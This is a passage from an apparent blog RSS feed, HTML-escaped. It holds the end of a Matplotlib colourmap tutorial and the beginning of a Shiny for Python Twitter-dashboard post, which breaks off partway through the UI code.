&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;N &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# No. of colours (large enough to appear continuous)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create N x 3 array of ones&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;carray &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ones((N, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Assign columns of array&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;carray[:, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linspace(&lt;span style="color:#a5d6ff"&gt;72&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, N)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;carray[:, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linspace(&lt;span style="color:#a5d6ff"&gt;152&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, N)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;carray[:, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linspace(&lt;span style="color:#a5d6ff"&gt;168&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, N)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create colourmap&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cont_cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ListedColormap(carray)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_cmap(cont_cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/continuous-colourbar-13.png" alt="Horizontal colour bar fading from turquoise on the left to white on the right. The x-axis ranges
from 0 to 1." width="768" /&gt;&lt;/p&gt;
&lt;h3 id="linearsegmentedcolormaps"&gt;LinearSegmentedColormaps&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;LinearSegmentedColormap&lt;/code&gt;s do not have a &lt;code&gt;.colors&lt;/code&gt; attribute. However, we can access the values in the colourmap by calling it with an array of integers.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cool &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;colormaps[&lt;span style="color:#a5d6ff"&gt;&amp;#34;cool&amp;#34;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;resampled(&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cool(range(&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## array([[0. , 1. , 1. , 1. ],
## [0.14285714, 0.85714286, 1. , 1. ],
## [0.28571429, 0.71428571, 1. , 1. ],
## [0.42857143, 0.57142857, 1. , 1. ],
## [0.57142857, 0.42857143, 1. , 1. ],
## [0.71428571, 0.28571429, 1. , 1. ],
## [0.85714286, 0.14285714, 1. , 1. ],
## [1. , 0. , 1. , 1. ]])
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Rather than taking a list of colours that make up the map, &lt;code&gt;LinearSegmentedColormap&lt;/code&gt;s take
an argument called &lt;code&gt;segmentdata&lt;/code&gt;. This argument is a dictionary with the keys &amp;ldquo;red&amp;rdquo;, &amp;ldquo;green&amp;rdquo;
and &amp;ldquo;blue&amp;rdquo;. Each value in the dictionary is a list of tuples.
These tuples specify colour values before and after points in the colourmap as (&lt;code&gt;i&lt;/code&gt;, &lt;code&gt;y[i-1]&lt;/code&gt;, &lt;code&gt;y[i+1]&lt;/code&gt;). Here &lt;code&gt;i&lt;/code&gt; is
a point on the map, &lt;code&gt;y[i-1]&lt;/code&gt; is the colour value of the point before &lt;code&gt;i&lt;/code&gt;, and &lt;code&gt;y[i+1]&lt;/code&gt; is the colour value
after &lt;code&gt;i&lt;/code&gt;. The other colour values on the map are obtained by performing linear interpolation between
these specified &lt;em&gt;anchor points&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;For example, we could have the following &lt;code&gt;segmentdata&lt;/code&gt; dictionary:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cdict &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;red&amp;#34;&lt;/span&gt;: [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# start off with r=0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0.25&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# r increases from 0-1 bewteen 0-0.25, then drops to 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# end with r=0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;green&amp;#34;&lt;/span&gt;: [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# start off with g=0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0.25&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# at 0.25, g is still 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0.75&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# g increases from 0-1 between 0.25-0.75, then drops to 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# g is 0 between 0.75 and 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;blue&amp;#34;&lt;/span&gt;: [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# start off with b=0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;0.75&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# b is 0 between 0 and 0.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# b increases from 0 to 1 between points 0.75 and 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this map,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;red is increased from 0&amp;ndash;1 over the first quarter of the map and then drops back to 0.&lt;/li&gt;
&lt;li&gt;green is increased from 0&amp;ndash;1 over the middle half of the map and then drops back to zero.&lt;/li&gt;
&lt;li&gt;blue is 0 till the final quarter of the map and is then increased from 0&amp;ndash;1 over the final quarter.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;LinearSegmentedColormap&lt;/code&gt; also takes a name argument. We can create a map from the dictionary
above with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;matplotlib.colors&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; LinearSegmentedColormap
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;seg_cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; LinearSegmentedColormap(&lt;span style="color:#a5d6ff"&gt;&amp;#34;seg_cmap&amp;#34;&lt;/span&gt;, cdict)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_cmap(seg_cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/linseg-cbar-cdict-15.png" alt="Horizontal colour bar with an x-axis range from 0 to 1. It starts as black at x=0 and
gradually changes to red at x=0.25. It goes sharply to black again and gradually changes to green
until x=0.75. It is black again and gradually changes to blue until x=1.0." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;This way of creating a colourmap is a bit longwinded. Luckily, there is an easier
way to create a &lt;code&gt;LinearSegmentedColormap&lt;/code&gt; using the &lt;code&gt;.from_list()&lt;/code&gt; method. This takes a
list of colours to be used as equally spaced anchor points.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;color_list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;#12a79d&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#293d9b&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#4898a8&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#40b93c&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;seg_cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; LinearSegmentedColormap&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;from_list(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mymap&amp;#34;&lt;/span&gt;, color_list)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_cmap(seg_cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/linseg-cbar-fromlist-17.png" alt="Horizontal colour bar with an x-axis range from 0 to 1. It shows a sequential colourmap
with colours gradually changing from turquoise to dark blue to light blue to green." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;In this blog we have covered the basics of how you can format plots and create colourmaps in
Matplotlib. Once we can do this there is a lot more to be said on how to choose these
settings to create clear and accessible plots, but we will leave that for a future post.&lt;/p&gt;
&lt;h2 id="useful-links"&gt;Useful links&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://matplotlib.org/stable/gallery/style_sheets/style_sheets_reference.html" rel="external"&gt;Style sheets reference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://matplotlib.org/stable/gallery/color/colormap_reference.html" rel="external"&gt;Available colourmaps reference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://matplotlib.org/stable/tutorials/colors/colormaps.html" rel="external"&gt;Classes of colourmaps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://matplotlib.org/stable/tutorials/colors/colormap-manipulation.html" rel="external"&gt;Matplotlib tutorial on colourmaps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pypi.org/project/palettable/" rel="external"&gt;Palettable package documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/customising-matplotlib/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny for Python: Creating a simple Twitter analytics dashboard</title><link>https://www.jumpingrivers.com/blog/shiny-python-rtweet-dashboard/</link><pubDate>Thu, 03 Nov 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-python-rtweet-dashboard/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-python-rtweet-dashboard/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-python-rtweet-dashboard/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="introduction"&gt;Introduction&lt;/h1&gt;
&lt;p&gt;As someone who has zero experience using &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;Shiny in R&lt;/a&gt;, the recent announcement that the framework had been made available to Python users inspired an opportunity for me to learn a new concept from a different perspective to most of my colleagues. I have been tasked with writing a Python related blog post, and having spent the past few weeks carrying out an analysis of Jumping Rivers&amp;rsquo; Twitter data (&lt;a href="https://www.twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt;), creating a dashboard to display some of my findings and then writing about it seemed like a nice way to cap off my 6-week summer placement at Jumping Rivers.&lt;/p&gt;
&lt;p&gt;This post will take you through some of the source code for the dashboard I created, whilst I provide a bit of context for the Twitter project itself. For a more bare-bones tutorial on using &lt;a href="https://shiny.rstudio.com/py/" rel="external"&gt;Shiny for Python&lt;/a&gt;, you can check out another recent Jumping Rivers blog post &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/" rel="external"&gt;here&lt;/a&gt;. I suggest reading this first.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-python-rtweet-dashboard"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="twitter-project-background"&gt;Twitter Project Background&lt;/h2&gt;
&lt;p&gt;The &lt;a href="https://www.twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt; Twitter project accounted for the first half of my time at Jumping Rivers. The aim of the project was to look into some of the factors that may (or may not) have been affecting levels of engagement with &lt;a href="https://www.twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt; tweets. The project also looked at the locations of Twitter users that &lt;a href="https://www.twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt; tweets are reaching and who is interacting with them. The data used in this project was acquired using {&lt;a href="https://cran.r-project.org/web/packages/rtweet/rtweet.pdf" rel="external"&gt;rtweet&lt;/a&gt;}, an R package designed to collect data via Twitter&amp;rsquo;s API.&lt;/p&gt;
&lt;h1 id="creating-a-dashboard"&gt;Creating a Dashboard&lt;/h1&gt;
&lt;p&gt;You may know that Shiny apps consist of a &lt;strong&gt;user interface (UI)&lt;/strong&gt; and a &lt;strong&gt;server function&lt;/strong&gt;. We will go through developing these one at a time. If you haven&amp;rsquo;t already, you will need to install &lt;a href="https://shiny.rstudio.com/py/" rel="external"&gt;{shiny}&lt;/a&gt; and other dependencies before we begin, in this instance &lt;a href="https://plotnine.readthedocs.io/en/stable/" rel="external"&gt;{plotnine}&lt;/a&gt; for plotting and &lt;a href="https://pandas.pydata.org/" rel="external"&gt;{pandas}&lt;/a&gt; for some data manipulation. This should be done in a virtual environment which helps to keep dependencies required by different projects separate. The &lt;a href="https://pypi.org/project/Jinja2/" rel="external"&gt;{Jinja2}&lt;/a&gt; dependency is required for some styling that will be applied to the tabular view of our dataframe.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;# shell
virtualenv .venv
source .venv/bin/activate
pip install shiny pandas plotnine Jinja2
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="user-interface"&gt;User Interface&lt;/h2&gt;
&lt;p&gt;This application will be created using a single source file (app.py) that creates both the user interface and server-side logic. First, we will create the user interface. The UI takes a range of input and output functions, and defines what users will see when they visit the dashboard. The {shiny} package provides a &lt;code&gt;ui&lt;/code&gt; module which has a host of functions for quickly creating your layout, inputs and outputs.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# app.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ui
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="layout"&gt;Layout&lt;/h3&gt;
&lt;p&gt;A &lt;code&gt;ui.page_*&lt;/code&gt; function is a top level container for our UI elements. &lt;code&gt;ui.page_fluid()&lt;/code&gt; gives us a full-width container spanning the entire width of the viewport, regardless of screen size.&lt;/p&gt;
&lt;p&gt;A &lt;code&gt;ui.layout_sidebar()&lt;/code&gt; provides a convenient mechanism for laying out content into two columns, a narrower container typically used for user input controls and a wider one for the main content. This is done by including &lt;code&gt;ui.panel_sidebar()&lt;/code&gt; and &lt;code&gt;ui.panel_main()&lt;/code&gt; within our layout function.&lt;/p&gt;
&lt;p&gt;This is what we have so far, laying out the core structure of our page&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# app.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app_ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page_fluid(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;layout_sidebar(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;panel_sidebar(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;panel_main()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="inputs-and-outputs"&gt;Inputs and Outputs&lt;/h3&gt;
&lt;p&gt;Now, we are going to put some input and output functions into our UI. These follow a predictable format and are easy to remember:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ui.input_*&lt;/code&gt; for inputs, which take values from the user, client-side, and send them to the server.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ui.output_*&lt;/code&gt; for outputs, which will receive data from the server and render it on the client.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For our Twitter dashboard, we want a plot (&lt;code&gt;ui.output_plot()&lt;/code&gt;) that will show how different factors affect the number of interactions a tweet receives. We will also have a table (&lt;code&gt;ui.output_table()&lt;/code&gt;) that shows the most recent tweets posted by &lt;a href="https://www.twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt;. Above the table, some descriptive text (&lt;code&gt;ui.output_text()&lt;/code&gt;) saying how many tweets are being viewed. The only argument required for an output function is the &lt;code&gt;id&lt;/code&gt;, which must be unique, used by the server function to identify the approriate container in which to render the content.&lt;/p&gt;
&lt;p&gt;We want the user to be able to change the x-axis variable on the plot so they can see how each factor affects interactions. For this, &lt;code&gt;ui.input_select()&lt;/code&gt; is a reasonable choice to give users the option of a constrained set of values. The number of entries in our table will be chosen by the user (&lt;code&gt;ui.input_numeric()&lt;/code&gt;) as well as the factors they want to see (&lt;code&gt;ui.input_checkbox_group()&lt;/code&gt; is a good choice for a collection of binary choices like this). This checkbox input we will wrap in a &lt;code&gt;ui.panel_conditional()&lt;/code&gt;, so that it only appears if a certain condition is satisfied (in our case if the user chooses to view any tweets at all). All input functions require:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;id&lt;/code&gt;: unique identifier for the element, used to refer to its value server-side&lt;/li&gt;
&lt;li&gt;&lt;code&gt;label&lt;/code&gt;: what the input will be labelled as to the viewer.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Many input functions will have additional arguments, such as &lt;code&gt;min&lt;/code&gt; and &lt;code&gt;max&lt;/code&gt; values for numeric inputs, or &lt;code&gt;choices&lt;/code&gt; and &lt;code&gt;selected&lt;/code&gt; for inputs where the user needs to make a selection that controls the specifics of that input.&lt;/p&gt;
&lt;p&gt;A full user interface is described below&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# app.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ui
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# dictionary of choices for input_select&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# x axis of our graph of form {&amp;#34;value&amp;#34;: &amp;#34;UI label&amp;#34;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;choices_select &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Year&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;day&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Day&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;hour&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hour&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;media_type&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Media&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
